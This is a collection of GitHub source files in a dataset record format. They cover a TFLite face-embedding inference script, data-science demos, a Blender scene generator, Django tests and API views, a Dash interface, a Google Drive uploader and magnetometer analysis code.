"usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "21318829311", "text": "import keras\nimport tensorflow as tf\nimport scipy.misc as misc\nimport argparse\nimport numpy as np\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('tflite_file', help='file of tflite model')\n parser.add_argument('image_files', type=str, nargs='+', 
help='file of image which is aligned')\n parser.add_argument('--image_size', default=112, type=int, help='size of image to feed the model')\n\n return parser.parse_args()\n\ndef load_images(args):\n # imgs = np.empty((len(args.image_files), args.image_size, args.image_size, 3), np.float32)\n for i, image in enumerate(args.image_files):\n # img = cv2.imread(image)\n # img = np.asarray(Image.open(image))\n img = misc.imread(image)\n img = misc.imresize(img, (args.image_size, args.image_size))\n img = (img - 127.5) * 0.0078125\n img = img.astype(np.float32)\n # imgs[i, ...] = img\n return np.stack([img])\n\ndef _main(args):\n interpreter = tf.lite.Interpreter(model_path=args.tflite_file)\n interpreter.allocate_tensors()\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n images = load_images(args)\n interpreter.set_tensor(input_details[0]['index'], images)\n interpreter.invoke()\n emb = interpreter.get_tensor(output_details[0]['index'])\n print('='*30)\n print('input is :')\n print(images,images.shape)\n print('=' * 30)\n print('output is :')\n print(emb, emb.shape)\n\n\n\nif __name__ == '__main__':\n \"\"\"\n python inference_example.py arch/pretrained_model/MobileFaceNet_iter_566000.tflite data/Figure_110.png\n \"\"\"\n _main(get_args())\n", "repo_name": "fanqie03/MobileFaceNet_keras", "sub_path": "inference_example.py", "file_name": "inference_example.py", "file_ext": "py", "file_size_in_byte": 1666, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.misc.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.misc", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.misc.imresize", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.misc", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.lite.Interpreter", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.lite", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "29255835792", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nnp.random.seed(42)\nx = np.random.rand(100) * 10\ny = 3 * x + np.random.randn(100) * 2\n\n\ndata = {'X': x, 'Y': y}\ndf = pd.DataFrame(data)\n\n\nplt.scatter(df['X'], df['Y'])\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('Doğrusal İlişki')\nplt.show()\n\n\ncorrelation = df['X'].corr(df['Y'])\nlinear_fit = np.polyfit(df['X'], df['Y'], 1)\nslope = linear_fit[0]\nintercept = linear_fit[1]\n\nprint('Korelasyon:', correlation)\nprint('Eğim:', slope)\nprint('Düzey:', intercept)\n", "repo_name": "Rk1coder/data_machine_learning_pratices", "sub_path": "practices_numpy_matplotlib_pandas_3.py", "file_name": "practices_numpy_matplotlib_pandas_3.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.random.seed", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 5, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 6, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 7, 
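`load_images` in the `inference_example.py` record above returns a batch containing only the last image, since the pre-allocated `imgs` array is commented out and `np.stack([img])` wraps just the final loop value; `scipy.misc.imread` and `imresize` were also removed from SciPy in 1.2. A replacement sketch using Pillow with the same (x - 127.5) * 0.0078125 normalization:

import numpy as np
from PIL import Image

def load_images(paths, size=112):
    batch = []
    for p in paths:
        img = Image.open(p).convert('RGB').resize((size, size))
        batch.append((np.asarray(img, dtype=np.float32) - 127.5) * 0.0078125)
    return np.stack(batch)   # shape: (len(paths), size, size, 3)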
"usage_type": "call"}, {"api_name": "numpy.random", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "3589367397", "text": "import bpy\nimport random\n\n# Clear all mesh objects\nbpy.ops.object.select_all(action='DESELECT')\nbpy.ops.object.select_by_type(type='MESH')\nbpy.ops.object.delete()\n\n# Parameters\ncity_size = 10\nbuilding_min_height = 1.0\nbuilding_max_height = 10.0\n\n# Function to create a random color material\ndef create_random_color_material(name):\n material = bpy.data.materials.new(name=name)\n material.use_nodes = True\n nodes = material.node_tree.nodes\n links = material.node_tree.links\n\n color = nodes.get('Principled BSDF')\n if color:\n color.inputs[0].default_value = (random.random(), random.random(), random.random(), 1)\n\n return material\n\n# Create buildings\nfor i in range(city_size):\n for j in range(city_size):\n building_height = random.uniform(building_min_height, building_max_height)\n \n bpy.ops.mesh.primitive_cube_add(size=1, enter_editmode=False, location=(i*2, j*2, building_height/2))\n \n building = bpy.context.object\n building.dimensions.z = building_height\n\n # Assign random color to the building\n material = create_random_color_material(f\"Material_{i}_{j}\")\n if building.data.materials:\n # Assign to first material slot\n building.data.materials[0] = material\n else:\n # No slots\n building.data.materials.append(material)\n", "repo_name": "mhatrep/Blender", "sub_path": "blender_city.py", "file_name": "blender_city.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "bpy.ops.object.select_all", "line_number": 5, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 5, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.select_by_type", "line_number": 6, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 6, "usage_type": "attribute"}, {"api_name": "bpy.ops.object.delete", "line_number": 7, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 7, "usage_type": "attribute"}, {"api_name": "bpy.data.materials.new", "line_number": 16, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 16, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 23, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 30, "usage_type": "call"}, {"api_name": "bpy.ops.mesh.primitive_cube_add", "line_number": 32, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bpy.context", 
"line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "13920409419", "text": "\"\"\"Contains the logic for extracting and transforming the project data.\"\"\"\n\nimport warnings\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom helpsk.logging import log_function_call, log_timer\nfrom sklearn.datasets import fetch_openml\n\n\n@log_function_call\n@log_timer\ndef extract() -> pd.DataFrame:\n \"\"\"Downloads and returns the credit data from openml.org.\"\"\"\n logging.info(\"Downloading credit data from https://www.openml.org/d/31\")\n credit_g = fetch_openml('credit-g', version=1)\n credit_data = credit_g['data']\n credit_data['target'] = credit_g['target']\n return credit_data\n\n\n@log_function_call\n@log_timer\ndef transform(credit__raw: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Transforms the credit data.\n\n Args:\n credit__raw: the raw data to transform\n \"\"\"\n credit = credit__raw.copy()\n # Create Missing Values\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n credit['duration'].iloc[0:46] = np.nan\n credit['checking_status'].iloc[25:75] = np.nan\n credit['credit_amount'].iloc[10:54] = 0\n return credit\n", "repo_name": "shane-kercheval/chat-search-docs", "sub_path": "source/service/etl.py", "file_name": "etl.py", "file_ext": "py", "file_size_in_byte": 1107, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.info", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 18, "usage_type": "call"}, {"api_name": "helpsk.logging.log_function_call", "line_number": 13, "usage_type": "name"}, {"api_name": "helpsk.logging.log_timer", "line_number": 14, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "attribute"}, {"api_name": "warnings.catch_warnings", "line_number": 35, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 38, "usage_type": "attribute"}, {"api_name": "helpsk.logging.log_function_call", "line_number": 24, "usage_type": "name"}, {"api_name": "helpsk.logging.log_timer", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "5312538538", "text": "from torch import optim\n\nfrom models import LightGCN\nfrom configuration import Config\n\nclass BPRLoss:\n def __init__(self, model: LightGCN, config: Config):\n self.decay = config.decay\n self.lr = config.lr\n self.model = model\n\n self.opt = optim.Adam(model.parameters(), lr=self.lr)\n\n def step(self, users, pos, neg):\n loss, reg_loss = self.model.bpr_loss(users, pos, neg)\n reg_loss = reg_loss * self.decay\n loss = loss + reg_loss\n\n # 优化模型参数\n self.opt.zero_grad()\n loss.backward()\n self.opt.step()\n\n return loss.cpu().item() # 返回loss的值", "repo_name": "dang-mai/LightGCN", "sub_path": "code/loss.py", "file_name": "loss.py", "file_ext": "py", "file_size_in_byte": 643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "models.LightGCN", "line_number": 7, "usage_type": "name"}, {"api_name": "configuration.Config", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 12, "usage_type": 
"name"}]} +{"seq_id": "23811273103", "text": "from django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom selenium.webdriver.common.by import By\n\nfrom functional_tests.base import FunctionalTest\nfrom functional_tests.management.commands.create_session import create_pre_authenticated_session\n\nUser = get_user_model()\n\nTEST_EMAIL = \"test@example.com\"\n\n\nclass MyListsTest(FunctionalTest):\n def create_pre_authenticated_session(self, email):\n if self.staging_server:\n from functional_tests.server_tools import create_session_on_server\n\n session_key = create_session_on_server(self.staging_server, email)\n else:\n session_key = create_pre_authenticated_session(email)\n\n self.browser.get(self.live_server_url + \"/404_no_such_url/\")\n self.browser.add_cookie(dict(name=settings.SESSION_COOKIE_NAME, value=session_key, path=\"/\"))\n\n def test_logged_in_users_lists_are_saved_as_my_lists(self):\n self.create_pre_authenticated_session(TEST_EMAIL)\n self.browser.get(self.live_server_url)\n\n self.add_list_item(\"First list item\")\n self.add_list_item(\"Second list item\")\n\n first_list_url = self.browser.current_url\n\n self.browser.find_element(By.LINK_TEXT, \"My lists\").click()\n\n self.wait_for(lambda: self.browser.find_element(By.LINK_TEXT, \"First list item\"))\n self.browser.find_element(By.LINK_TEXT, \"First list item\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.current_url, first_list_url))\n\n self.browser.get(self.live_server_url)\n self.add_list_item(\"Another list item\")\n second_list_url = self.browser.current_url\n\n self.browser.find_element(By.LINK_TEXT, \"My lists\").click()\n\n self.wait_for(lambda: self.browser.find_element(By.LINK_TEXT, \"Another list item\"))\n self.browser.find_element(By.LINK_TEXT, \"Another list item\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.current_url, second_list_url))\n\n self.browser.find_element(By.LINK_TEXT, \"Log out\").click()\n self.wait_for(lambda: self.assertEqual(self.browser.find_elements(By.LINK_TEXT, \"My lists\"), []))\n", "repo_name": "VolodymyrVdovyn/TDD_book_django_project", "sub_path": "src/functional_tests/test_my_lists.py", "file_name": "test_my_lists.py", "file_ext": "py", "file_size_in_byte": 2155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 8, "usage_type": "call"}, {"api_name": "functional_tests.base.FunctionalTest", "line_number": 13, "usage_type": "name"}, {"api_name": "functional_tests.server_tools.create_session_on_server", "line_number": 18, "usage_type": "call"}, {"api_name": "functional_tests.management.commands.create_session.create_pre_authenticated_session", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.SESSION_COOKIE_NAME", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 34, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 37, "usage_type": "attribute"}, {"api_name": 
"selenium.webdriver.common.by.By", "line_number": 37, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 44, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.LINK_TEXT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "5582089803", "text": "import dash\nfrom dash import html, Input, Output, dcc, callback\nimport dash_bootstrap_components as dbc\nimport hashlib\nimport pathlib\nfrom functools import lru_cache\nfrom utils.add_ip import AddIP\nfrom utils.add_vlan import AddVLAN\nfrom utils.fiber_port import FiberPort\nfrom utils.network_port import NetworkPort\nfrom dash.exceptions import PreventUpdate\n\n\nclass BodyComponent:\n def __init__(self) -> None:\n self._id = hashlib.md5(\n str(pathlib.Path(__file__).absolute()).encode()).hexdigest()\n self.register_options = {\n 'ip': AddIP(),\n 'vlan': AddVLAN(),\n 'fiber': FiberPort(),\n 'network': NetworkPort(),\n }\n self.events()\n\n def id(self, name):\n return f\"{name}-{self._id}\"\n\n def load_data(self) -> None:\n pass\n\n @property\n def layout(self):\n self.load_data()\n return dbc.Container([\n dbc.Row([\n dbc.Col([\n html.H1('Datacom', style={'text-align': 'center'}),\n html.Hr(),\n html.H5('Configurar:'),\n dcc.RadioItems([\n 'Adicionar IP',\n \"Adicionar VLAN's\",\n 'Porta de fibra',\n 'Porta de Rede'\n ], id=self.id('select_config')),\n ], width=2),\n dbc.Col([\n dbc.Spinner(html.Div([\n ], id=self.id('output_config')))\n ], width=9)\n ])\n ])\n\n def events(self) -> None:\n @callback(\n Output(self.id('output_config'), 'children'),\n Input(self.id('select_config'), 'value'),\n prevent_initial_call=True\n )\n def altern_configs(value):\n if value == 'Adicionar IP':\n return self.register_options['ip'].layout\n if value == \"Adicionar VLAN's\":\n return self.register_options['vlan'].layout\n if value == 'Porta de fibra':\n return self.register_options['fiber'].layout\n if value == 'Porta de Rede':\n return self.register_options['network'].layout\n raise PreventUpdate\n", "repo_name": "Sidimar-Salla/Scripts_SSH", "sub_path": "components/body.py", "file_name": "body.py", "file_ext": "py", "file_size_in_byte": 2255, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "hashlib.md5", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.add_ip.AddIP", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.add_vlan.AddVLAN", "line_number": 20, "usage_type": "call"}, {"api_name": "utils.fiber_port.FiberPort", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.network_port.NetworkPort", "line_number": 22, "usage_type": "call"}, 
{"api_name": "dash_bootstrap_components.Container", "line_number": 35, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 36, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 37, "usage_type": "call"}, {"api_name": "dash.html.H1", "line_number": 38, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 38, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 39, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 39, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 40, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 40, "usage_type": "name"}, {"api_name": "dash.dcc.RadioItems", "line_number": 41, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 41, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 48, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Spinner", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 49, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 49, "usage_type": "name"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 70, "usage_type": "name"}, {"api_name": "dash.callback", "line_number": 56, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 57, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "74402252284", "text": "# -*- coding: utf-8 -*-\n\nimport json\n\nclass ResponseBase(object):\n\t\"\"\"\n\t基类\n\t\"\"\"\n\t__slots__ = (\n\t\t'body',\n\t)\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef to_string(self):\n\t\traise NotImplementedError\n\nclass ErrorResponse(ResponseBase):\n\t__slots__ = (\n\t\t'code',\n\t\t'errMsg',\n\t\t'innerErrMsg',\n\t)\n\n\t@classmethod\n\tdef get_from_exception(cls, e):\n\t\tinstance = ErrorResponse(\n\t\t\tcode = e.code,\n\t\t\terrMsg = e.message,\n\t\t)\n\t\treturn instance\n\n\tdef __init__(self, code=500, errMsg='', innerErrMsg=''):\n\t\tself.code = code\n\t\tself.errMsg = errMsg\n\t\tself.innerErrMsg = innerErrMsg or errMsg\n\n\t\tsuper(ErrorResponse, self).__init__()\n\n\tdef to_string(self):\n\t\treturn json.dumps({\n\t\t\t'code': self.code,\n\t\t\t'errMsg': self.errMsg,\n\t\t\t'innerErrMsg': self.innerErrMsg\n\t\t})\n\nclass JsonResponse(ResponseBase):\n\n\t__slots__ = (\n\t\t'code',\n\t\t'data',\n\t)\n\n\tdef __init__(self, data):\n\t\tsuper(JsonResponse, self).__init__()\n\t\tself.code = 200\n\t\tself.data = data\n\t\tself.body = data\n\n\tdef to_string(self):\n\t\treturn json.dumps({\n\t\t\t'code': self.code,\n\t\t\t'data': self.data\n\t\t})\n\nclass RawResponse(ResponseBase):\n\n\tdef __init__(self, data):\n\t\tsuper(RawResponse, self).__init__()\n\t\tself.body = data\n\n\tdef to_string(self):\n\t\treturn self.body", "repo_name": "limoxi/rust", "sub_path": "rust/core/resp.py", "file_name": "resp.py", "file_ext": "py", "file_size_in_byte": 1192, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.dumps", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "29550971658", "text": "from django.forms.models import model_to_dict\nfrom django.http import JsonResponse\nfrom django.views.generic.detail import BaseDetailView\nfrom django.views.generic.list import BaseListView\nfrom movies.models import Filmwork\n\n\nclass MoviesApiMixin:\n model = Filmwork\n 
http_method_names = ['get']\n attributes = ('title',\n 'description',\n 'creation_date',\n 'rating',\n 'type')\n\n def get_queryset(self):\n return self.model.objects.prefetch_related('genres', 'persons')\n\n def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)\n\n def serialize(self, obj: Filmwork) -> dict:\n '''\n Returns the dict from Filmwork.\n\n Parameters:\n obj(Filmwork): object Filmwork to serialize\n\n Returns:\n data(dict): Serialized object Filmwork\n\n Необходим, т.к. сериализатор Django не умеет обрабатывать m2m связи\n в моделях, возвращая либо ошибку сериализации\n в случае с BaseDetailView, либо id связанной таблицы\n в случае с BaseListView\n '''\n data = model_to_dict(obj, fields=self.attributes)\n\n data.update({\n 'id': obj.id,\n 'genres': [genre.name for genre in obj.genres.all()],\n 'actors': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='actor')],\n 'directors': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='director')],\n 'writers': [person.full_name for person in obj.persons.filter(\n personfilmwork__role='writer')],\n })\n return data\n\n\nclass MoviesListApi(MoviesApiMixin, BaseListView):\n paginate_by: int = 50\n\n def get_context_data(self, *, object_list=None, **kwargs):\n queryset = self.get_queryset()\n paginator, page, queryset, is_paginated = self.paginate_queryset(\n queryset,\n self.paginate_by\n )\n context = {\n 'count': paginator.count,\n 'total_pages': paginator.num_pages,\n 'prev': page.previous_page_number() if page.has_previous() else None,\n 'next': page.next_page_number() if page.has_next() else None,\n 'results': [self.serialize(obj) for obj in page.object_list],\n }\n return context\n\n\nclass MoviesDetailApi(MoviesApiMixin, BaseDetailView):\n\n def get_context_data(self, object, **kwargs):\n return self.serialize(object)\n", "repo_name": "elezbar/new_admin_panel_sprint_2", "sub_path": "django_api/movies_admin/movies/api/v1/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2745, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "movies.models.Filmwork", "line_number": 9, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 21, "usage_type": "call"}, {"api_name": "movies.models.Filmwork", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.models.model_to_dict", "line_number": 38, "usage_type": "call"}, {"api_name": "django.views.generic.list.BaseListView", "line_number": 53, "usage_type": "name"}, {"api_name": "django.views.generic.detail.BaseDetailView", "line_number": 72, "usage_type": "name"}]} +{"seq_id": "19654050090", "text": "# run: pip install pydrive\r\n\r\nfrom pydrive.auth import GoogleAuth\r\nfrom pydrive.drive import GoogleDrive\r\nimport os\r\nfrom os import path\r\nimport itertools\r\n\r\nsettings_dir = 'Cloud_auth'\r\nauth_file = path.join(os.getcwd(), settings_dir, 'Google_auth.json')\r\nfolder_on_drive = \"Measurements\"\r\n\r\n\r\nclass GoogleDriveUploader:\r\n @staticmethod\r\n def __GetDrivePath(source_path):\r\n base, p1 = path.split(source_path)\r\n base2, p2 = path.split(base)\r\n return path.join(folder_on_drive, p2, p1)\r\n\r\n @staticmethod\r\n def __add_parent(dic, id_parent):\r\n dic['parents'] = [{'kind': 'drive#fileLink', 'id': id_parent}]\r\n\r\n def __create_folder(self, folder_name, parent_id=None):\r\n folder_metadata = {'title': folder_name, 'mimeType': 
r'application/vnd.google-apps.folder'}\r\n if parent_id is not None:\r\n self.__add_parent(folder_metadata, parent_id)\r\n\r\n folder = self.drive.CreateFile(folder_metadata)\r\n folder.Upload()\r\n\r\n return folder['id']\r\n\r\n def __is_object_exists(self, folder_name, parent_id=None):\r\n if parent_id is None:\r\n parent_id = 'root'\r\n strList = f\"'{parent_id}' in parents and trashed=false\"\r\n file_list = self.drive.ListFile({'q': strList})\r\n # a bug in the library: returns list of lists, not just list\r\n for cf in itertools.chain(*list(file_list)):\r\n if cf['title'] == folder_name:\r\n return cf['id']\r\n return None\r\n\r\n def __create_folders(self, full_path):\r\n if full_path[0] == r'/' or full_path[0] == '\\\\':\r\n full_path = full_path[1:]\r\n if full_path[-1] == r'/' or full_path[-1] == '\\\\':\r\n full_path = full_path[:-1]\r\n prev_id = None\r\n for subdir in full_path.split('\\\\'):\r\n curr_id = self.__is_object_exists(subdir, parent_id=prev_id)\r\n if curr_id is None: # if exists, then create\r\n prev_id = self.__create_folder(subdir, parent_id=prev_id)\r\n else:\r\n prev_id = curr_id # else leave existing folder\r\n return prev_id\r\n\r\n def __upload_file(self, filepath, folder_id=None):\r\n fname = path.split(filepath)[-1]\r\n dic = {'title': fname}\r\n if folder_id is not None:\r\n self.__add_parent(dic, folder_id)\r\n if self.__is_object_exists(fname, folder_id):\r\n print('File', fname, 'already exists, skipping...')\r\n f = self.drive.CreateFile(dic)\r\n f.SetContentFile(filepath)\r\n f.Upload()\r\n\r\n def __init__(self):\r\n try:\r\n gauth = GoogleAuth()\r\n gauth.DEFAULT_SETTINGS['client_config_file'] = path.join(os.getcwd(), settings_dir, 'client_secrets.json')\r\n\r\n if path.exists(auth_file):\r\n gauth.LoadCredentialsFile(credentials_file=auth_file)\r\n\r\n gauth.LocalWebserverAuth()\r\n gauth.SaveCredentialsFile(credentials_file=auth_file)\r\n\r\n self.gauth = gauth\r\n\r\n self.drive = GoogleDrive(gauth)\r\n except Exception as e:\r\n print('Google Drive authorization failed')\r\n self.gauth = None\r\n print(e)\r\n\r\n # uploads a folder with measurements results to Google drive\r\n # puts it into folder which name is specified by folder_on_drive variable\r\n # creates there two last folders from path\r\n def UploadMeasFolder(self, dir_path):\r\n print('Uploading results to Google drive...')\r\n try:\r\n folder = self.__GetDrivePath(dir_path)\r\n idFolder = self.__create_folders(folder)\r\n\r\n for f in os.listdir(dir_path):\r\n print('Uploading:', f)\r\n full_fpath = path.join(dir_path, f)\r\n self.__upload_file(full_fpath, idFolder)\r\n print('Data were successfully uploaded to:', folder)\r\n except Exception as e:\r\n print('Unable to upload data onto Google Drive')\r\n print(e)\r\n", "repo_name": "MukhanovaE/ColdDCMeasurements", "sub_path": "DC_Measurements/Lib/GoogleDrive.py", "file_name": "GoogleDrive.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "name"}, 
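`__is_object_exists` in the `GoogleDrive.py` record above pages through every child and works around PyDrive's list-of-lists iteration quirk with `itertools.chain`. A sketch of an alternative that filters server-side with a `title` clause (Drive v2 query syntax; assumes `drive` is an authenticated PyDrive `GoogleDrive` instance and that titles contain no quote characters needing escaping):

def find_child_id(drive, title, parent_id='root'):
    # Ask the Drive API to match the title instead of scanning locally.
    query = f"'{parent_id}' in parents and trashed=false and title='{title}'"
    matches = drive.ListFile({'q': query}).GetList()
    return matches[0]['id'] if matches else None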
{"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "name"}, {"api_name": "pydrive.auth.GoogleAuth", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "name"}, {"api_name": "os.getcwd", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "name"}, {"api_name": "pydrive.drive.GoogleDrive", "line_number": 84, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "name"}]} +{"seq_id": "39925204235", "text": "# 0 uso modulo desde otro modulo\n# 1 uso modulo y quiero que me haga plots y los guarde\nMODO_mva = 0\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker\nimport random\nimport statistics as st\nimport os\n\nfrom mag import shock_date\nimport coplanaridad_funciones as fcop\n\nfrom delimitacionshock import Bx, By, Bz, t_mag, Bu\nfrom subestructuras_calculos_2 import N\nB_vec = np.array([Bx, By, Bz]).T\n\npath_analisis = r'C:\\Users\\sofia\\Documents\\Facultad\\Tesis\\Analisis/{}/'.format(shock_date)\nif not os.path.exists(path_analisis):\n os.makedirs(path_analisis)\n\n#%% (EJEMPLO) datos 5:18:20.49 a 5:19:26 Oct 19 1984\n#\n#path = 